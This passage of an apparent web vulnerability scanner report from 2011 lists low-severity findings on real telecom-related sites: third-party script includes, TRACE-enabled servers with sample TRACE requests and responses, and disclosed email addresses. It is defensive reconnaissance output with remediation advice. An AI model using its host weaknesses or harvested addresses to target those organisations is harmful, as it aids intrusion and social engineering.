Severity:	Information
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/knowledge_base/loadingAnimation.gif

Issue detail

The response dynamically includes the following scripts from other domains:

http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true
http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com
http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en
http://www.google.com/cse/api/overlay.js
http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en

Request

GET /knowledge_base/loadingAnimation.gif HTTP/1.1
Host: www.redskye911.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/knowledge_base/
Cookie: ASP.NET_SessionId=1bw3xe552lbj2j551tb0bb55; kilo_boat_cid=911078775; tz=5; __utma=112137735.110952242.1305162418.1305162418.1305162418.1; __utmb=112137735.1.10.1305162418; __utmc=112137735; __utmz=112137735.1305162418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Page Not Found
Date: Thu, 12 May 2011 01:07:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16405

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Page Not Found : RedSky - The leader in E911 solutions
</title><link rel="stylesheet" type="text/css" media="print" href="/common/style-
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_012934998381076637628%3A0-dzu3ilx4q&lang=en"></script>
...[SNIP]...
</style>

<script src="http://www.google.com/uds/api?file=uds.js&v=1.0&key=ABQIAAAATpp8ZTCDvylJJa3dBnRE0hS95PXrV95R1cJ5dwLHOuJUMt0dzRTLEPq_6KUCa-yqty1kHN2olwgLCQ&hl=en" type="text/javascript"></script>
<script src="http://www.google.com/cse/api/overlay.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" charset="utf-8" src="http://www.etalkup.com/formjsforoneutf8.aspx?workgroup=redsky_wg@workgroup.etalkup.com"></script>
...[SNIP]...
<li><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&charset=utf-8&style=default&publisher=c1ea39a0-16fe-418f-add8-b4757072c581&popup=true"></script>
...[SNIP]...

19.43. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Issue detail

The response dynamically includes the following scripts from other domains:

https://s7.addthis.com/js/250/addthis_widget.js
https://www.nanpa.org/javascript/curr_year.js
https://www.nanpa.org/startup_rc.js

Request

Response

19.44. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The response dynamically includes the following scripts from other domains:

https://s7.addthis.com/js/250/addthis_widget.js
https://www.nanpa.org/javascript/curr_year.js
https://www.nanpa.org/startup_rc.js

Request

Response

19.45. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html

Issue detail

The response dynamically includes the following scripts from other domains:

https://s7.addthis.com/js/250/addthis_widget.js
https://www.nanpa.org/javascript/curr_year.js
https://www.nanpa.org/startup_rc.js

Request

Response

19.46. http://www.secviz.org/node/89 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.secviz.org
Path:	/node/89

Issue detail

The response dynamically includes the following scripts from other domains:

http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/secviz.json?callback=twitterCallback2&count=5

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:56 GMT
Server: Apache/2.2.17
Set-Cookie: SESS511f69598f6d24673b9cd181bd44c360=3679a5a8e5f156807fb4105e9bf204df; expires=Sat, 04-Jun-2011 04:22:16 GMT; path=/; domain=.secviz.org
Last-Modified: Wed, 11 May 2011 22:47:09 GMT
ETag: "13ef58d2264914230329c15df5277159"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 17680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<title>The D
...[SNIP]...
</div>
<script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script><script text="text/javascript" src="http://twitter.com/statuses/user_timeline/secviz.json?callback=twitterCallback2&count=5"></script>
...[SNIP]...

19.47. http://www.stumbleupon.com/badge/embed/1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/badge/embed/1/

Issue detail

The response dynamically includes the following script from another domain:

http://cdn.stumble-upon.com/js/badge_su.js?v=20110511

Request

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 00:48:21 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 1291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<link rel="stylesheet" href="http://cdn.stumble-upon.com/css/badges_su.css?v=20110511" type="text/css" media="screen, projection" />

                       <script type="text/javascript" src="http://cdn.stumble-upon.com/js/badge_su.js?v=20110511"></script>
...[SNIP]...

19.48. http://www.vonage-forum.com/forum8.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vonage-forum.com
Path:	/forum8.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.3/jquery-ui.min.js

Request

Response

19.49. http://www.vonage.com/lp/US/afflpdc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vonage.com
Path:	/lp/US/afflpdc/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/prototype/1.7/prototype.js

Request

Response

19.50. http://www.vonage.com/lp/US/afflpdc/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vonage.com
Path:	/lp/US/afflpdc/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/prototype/1.7/prototype.js

Request

Response

19.51. http://www.westcongroup.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.westcongroup.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

19.52. http://www.westcongroup.com/sites/westcon-group-global/global/compass-e-commerce previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.westcongroup.com
Path:	/sites/westcon-group-global/global/compass-e-commerce

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /sites/westcon-group-global/global/compass-e-commerce HTTP/1.1
Host: www.westcongroup.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.westcongroup.com/
Cookie: JSESSIONID=CEFDB1C35595D86CB0F4932B0E69893F; __utma=51648943.305824551.1305162631.1305162631.1305162631.1; __utmb=51648943; __utmc=51648943; __utmz=51648943.1305162631.1.1.utmccn=(referral)|utmcsr=redskye911.com|utmcct=/e911_products/e911_anywhere/hosted/purchasing/|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:10:39 GMT
Server: Apache/2.2.8 (EL)
Set-Cookie: wcc_341_2256_=""; Expires=Fri, 11-May-2012 01:10:39 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 11812

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20. TRACE method is enabled previous next
There are 16 instances of this issue:

http://api.demandbase.com/
http://connectedplanetonline.com/
http://metrics.connectedplanetonline.com/
http://metrics.vonage.com/
http://mobilitypoint.westcon.com/
http://netvoipcommunications.com/
http://support.sprint.com/
http://tis.org/
http://tracking.hubspot.com/
http://www.commpartnersconnect.com/
http://www.resourcenter.net/
http://www.stumbleupon.com/
http://www.virtual-phone-number.org/
http://www.vonage-forum.com/
http://www.vonage.com/
http://www.westcongroup.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

20.1. http://api.demandbase.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.demandbase.com
Path:	/

Request

TRACE / HTTP/1.0
Host: api.demandbase.com
Cookie: c7c81c731b6d44c2

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Thu, 12 May 2011 00:46:49 GMT
Server: Apache
Content-Length: 177
Connection: Close

TRACE / HTTP/1.1
host: api.demandbase.com
Cookie: c7c81c731b6d44c2
X-Forwarded-For: 173.193.214.243
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive

20.2. http://connectedplanetonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://connectedplanetonline.com
Path:	/

Request

TRACE / HTTP/1.0
Host: connectedplanetonline.com
Cookie: 8b7d18b1c972293d

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:44 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 8b7d18b1c972293d
Host: connectedplanetonline.com

20.3. http://metrics.connectedplanetonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.connectedplanetonline.com
Path:	/

Request

TRACE / HTTP/1.0
Host: metrics.connectedplanetonline.com
Cookie: 58649ce6d81cdfc5

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:47:47 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: metrics.connectedplanetonline.com
Cookie: 58649ce6d81cdfc5
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

20.4. http://metrics.vonage.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.vonage.com
Path:	/

Request

TRACE / HTTP/1.0
Host: metrics.vonage.com
Cookie: fbc4a6ca38320186

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:50:42 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: metrics.vonage.com
Cookie: fbc4a6ca38320186
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

20.5. http://mobilitypoint.westcon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mobilitypoint.westcon.com
Path:	/

Request

TRACE / HTTP/1.0
Host: mobilitypoint.westcon.com
Cookie: 3124f9a2d4dd3c2a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:10:39 GMT
Server: Apache/2.2.8 (EL)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: mobilitypoint.westcon.com
Cookie: 3124f9a2d4dd3c2a

20.6. http://netvoipcommunications.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://netvoipcommunications.com
Path:	/

Request

TRACE / HTTP/1.0
Host: netvoipcommunications.com
Cookie: 9b731c03efcfb14

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:17 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: netvoipcommunications.com
Cookie: 9b731c03efcfb14

20.7. http://support.sprint.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.sprint.com
Path:	/

Request

TRACE / HTTP/1.0
Host: support.sprint.com
Cookie: 18b8f0e9d3e30658

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: TLTSID=3796EBAC7C31107C04C3A75B3A5FEB23; Path=/; Domain=.sprint.com
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: support.sprint.com
Cookie: 18b8f0e9d3e30658; TLTSID=3796EBAC7C31107C04C3A75B3A5FEB23

20.8. http://tis.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tis.org
Path:	/

Request

TRACE / HTTP/1.0
Host: tis.org
Cookie: 46d44e92e0cfaa8a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:43:07 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tis.org
Cookie: 46d44e92e0cfaa8a
X-Forwarded-For: 173.193.214.243
Connection-IsSecure: No

20.9. http://tracking.hubspot.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tracking.hubspot.com
Path:	/

Request

TRACE / HTTP/1.0
Host: tracking.hubspot.com
Cookie: 93e98ae4a330e93a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:25 GMT
Server: Apache/2.2.6 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tracking.hubspot.com
Cookie: 93e98ae4a330e93a

20.10. http://www.commpartnersconnect.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.commpartnersconnect.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.commpartnersconnect.com
Cookie: cc0dd5a2203165f4

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:50:34 GMT
Server: Apache/2.0.59 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.commpartnersconnect.com
Cookie: cc0dd5a2203165f4

20.11. http://www.resourcenter.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/

Request

TRACE / HTTP/1.0
Host: www.resourcenter.net
Cookie: 7d6cbc03e2fba563

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 00:04:46 GMT
Content-Type: message/http
Content-Length: 74

TRACE / HTTP/1.0
Host: www.resourcenter.net
Cookie: 7d6cbc03e2fba563

20.12. http://www.stumbleupon.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stumbleupon.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.stumbleupon.com
Cookie: 6dd2f0967e3972aa

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Host
Content-Type: message/http
Content-Length: 177
Date: Thu, 12 May 2011 00:46:54 GMT
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Cookie: 6dd2f0967e3972aa
X-Forwarded-For: 173.193.214.243
host: www.stumbleupon.com
X-Pool-Chosen: default
X-Varnish: 468342232
Connection: keep-alive

20.13. http://www.virtual-phone-number.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.virtual-phone-number.org
Path:	/

Request

TRACE / HTTP/1.0
Host: www.virtual-phone-number.org
Cookie: f653404ca3151669

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:14 GMT
Server: Apache/2.2.6 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.virtual-phone-number.org
Cookie: f653404ca3151669

20.14. http://www.vonage-forum.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vonage-forum.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.vonage-forum.com
Cookie: 2a34132809ece9da

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:45:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.vonage-forum.com
Cookie: 2a34132809ece9da

20.15. http://www.vonage.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vonage.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.vonage.com
Cookie: c7bdafeb40562684

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:50:30 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.vonage.com
Cookie: c7bdafeb40562684

20.16. http://www.westcongroup.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.westcongroup.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.westcongroup.com
Cookie: 9b959a1992ebe5b5

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:10:25 GMT
Server: Apache/2.2.8 (EL)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.westcongroup.com
Cookie: 9b959a1992ebe5b5

21. Email addresses disclosed previous next
There are 71 instances of this issue:

http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
http://connectedplanetonline.com/js/jquery-cookie.js
http://forum.link2voip.com/viewtopic.php
https://lnp.activationnow.com/lnp/jsp/logon/login.jsp
http://nanpa.com/
http://nanpa.org/
http://nanpa.org/about_overview.php
http://nanpa.org/awards_overview.php
http://nanpa.org/education_overview.php
http://nanpa.org/history.php
http://nanpa.org/javascript/cookieman.js
http://nanpa.org/javascript/curr_year.js
http://nanpa.org/javascript/external.js
http://nanpa.org/javascript/fontsizer.js
http://nanpa.org/javascript/gen_mm_object.js
http://nanpa.org/pullout_menus.js
http://nanpa.org/startup.js
http://netvoipcommunications.com/additional-services.html
http://netvoipcommunications.com/js/hoverintent.js
http://netvoipcommunications.com/pricing.html
http://www.911enable.com/
http://www.911enable.com/business.php
http://www.911enable.com/business/contact_specialist.php
http://www.911enable.com/business/resource_center/knowledge_base.php
http://www.911enable.com/login/index.php
http://www.atis.org/
http://www.atis.org/cioc_foss.asp
http://www.google.com/search
http://www.job-search-engine.com/assets/js/niftycube.js
http://www.job-search-engine.com/keyword/number-portability/
http://www.nanpa.org/javascript/cookieman.js
http://www.nanpa.org/javascript/curr_year.js
http://www.nanpa.org/javascript/external.js
http://www.nanpa.org/javascript/fontsizer.js
http://www.nanpa.org/javascript/gen_mm_object.js
http://www.nanpa.org/pullout_menus.js
http://www.nanpa.org/startup.js
http://www.nationalnanpa.com/contact_us/index.cgi
http://www.nationalnanpa.com/nas/public/assigned_code_query_display.do
http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do
https://www.nationalnanpa.com/nas/security/authUser.do
https://www.nationalnanpa.com/nas/security/logon.do
https://www.nationalnanpa.com/nas/security/user_reg_mail.do
https://www.nationalnanpa.com/nas/security/user_reg_pre_mail.do
https://www.nationalnanpa.com/nas/security/user_reg_pre_step1.do
https://www.nationalnanpa.com/nas/security/user_reg_pre_step2.do
https://www.nationalnanpa.com/nas/security/user_reg_step1.do
http://www.onwav.com/css/style.css
http://www.redskye911.com/
http://www.redskye911.com/e911_information_center/
http://www.redskye911.com/e911_information_center/e911_hosted_solutions/
http://www.redskye911.com/e911_information_center/e911_hosted_solutions/loadingAnimation.gif
http://www.redskye911.com/e911_information_center/loadingAnimation.gif
http://www.redskye911.com/e911_products/
http://www.redskye911.com/e911_products/e911_anywhere/hosted/
http://www.redskye911.com/e911_products/e911_anywhere/hosted/loadingAnimation.gif
http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/
http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/loadingAnimation.gif
http://www.redskye911.com/e911_products/e911_anywhere/network_services/
http://www.redskye911.com/e911_products/loadingAnimation.gif
http://www.redskye911.com/favicon.ico
http://www.redskye911.com/knowledge_base/
http://www.redskye911.com/knowledge_base/loadingAnimation.gif
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreItems.html
http://www.secviz.org/node/89
http://www.sprint.com/assets/scripts/analytics/analyticsFramework.js
http://www.sprint.com/assets/scripts/analytics/voc/surveyLogic.js
http://www.westcongroup.com/
http://www.westcongroup.com/sites/westcon-group-global/global/compass-e-commerce

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

21.1. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://connectedplanetonline.com
Path:	/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

Issue detail

The following email address was disclosed in the response:

webmaster@penton.com

Request

Response

21.2. http://connectedplanetonline.com/js/jquery-cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://connectedplanetonline.com
Path:	/js/jquery-cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /js/jquery-cookie.js HTTP/1.1
Host: connectedplanetonline.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:46 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Last-Modified: Wed, 03 Mar 2010 13:51:00 GMT
ETag: "177d917e-1097-4b8e6944"
Accept-Ranges: bytes
Content-Length: 4247
Content-Type: application/x-javascript

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

21.3. http://forum.link2voip.com/viewtopic.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.link2voip.com
Path:	/viewtopic.php

Issue detail

The following email addresses were disclosed in the response:

lnp@link2voip.com
support@link2voip.com

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:44:43 GMT
Set-Cookie: phpbb3_82ha5_u=1; expires=Fri, 11-May-2012 00:44:43 GMT; path=/; domain=forum.link2voip.com; HttpOnly
Set-Cookie: phpbb3_82ha5_k=; expires=Fri, 11-May-2012 00:44:43 GMT; path=/; domain=forum.link2voip.com; HttpOnly
Set-Cookie: phpbb3_82ha5_sid=30cf441e48c964d411cc69972e856ae1; expires=Fri, 11-May-2012 00:44:43 GMT; path=/; domain=forum.link2voip.com; HttpOnly
Content-type: text/html; charset=UTF-8
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Content-Length: 36649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<a href="mailto:lnp@link2voip.com">lnp@link2voip.com</a>
...[SNIP]...
<a href="mailto:lnp@link2voip.com">lnp@link2voip.com</a>
...[SNIP]...
<a href="mailto:lnp@link2voip.com">lnp@link2voip.com</a>
...[SNIP]...
<a href="mailto:support@link2voip.com">support@link2voip.com</a>
...[SNIP]...

21.4. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://lnp.activationnow.com
Path:	/lnp/jsp/logon/login.jsp

Issue detail

The following email address was disclosed in the response:

NOC@synchronoss.com

Request

Response

HTTP/1.1 200 OK
Set-Cookie: LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Cache-Control: no-store
Date: Thu, 12 May 2011 00:50:20 GMT
Pragma: no-cache
Content-Length: 6277
Content-Type: text/html; charset=ISO-8859-1
Expires: Wed, 31 Dec 1969 23:59:59 GMT
X-Powered-By: Servlet/2.4 JSP/2.0

<html>
<!--
/*
* @(#)login.jsp 5/1/2001 11:55:44 AM
*
* Copyright 2001-2009 Synchronoss Technologies, Inc. 1525 Valley Center Parkway,
* Bethlehem, Pennsylvania, 18017, U.S.A. All Rights R
...[SNIP]...
<a href="mailto:NOC@synchronoss.com?subject=Login issue&body=Please describe the issue:%0A%0AUser Name:%0A%0ALogin ID:%0A%0AContact Information (in case we have any questions):%0A%0AApplication: Telco (lnp.activationnow.com)" style="margin-left: 20px;">Email:NOC@synchronoss.com</a>
...[SNIP]...

21.5. http://nanpa.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

nanpa-login@Neustar.biz
nanpa-login@neustar.biz

Request

Response

21.6. http://nanpa.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.org
Path:	/

Issue detail

The following email address was disclosed in the response:

info@nanpa.org

Request

Response

21.7. http://nanpa.org/about_overview.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.org
Path:	/about_overview.php

Issue detail

The following email address was disclosed in the response:

info@nanpa.org

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:19 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<a href="mailto:info@nanpa.org">info@nanpa.org</a>
...[SNIP]...

21.8. http://nanpa.org/awards_overview.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.org
Path:	/awards_overview.php

Issue detail

The following email address was disclosed in the response:

info@nanpa.org

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:05:01 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
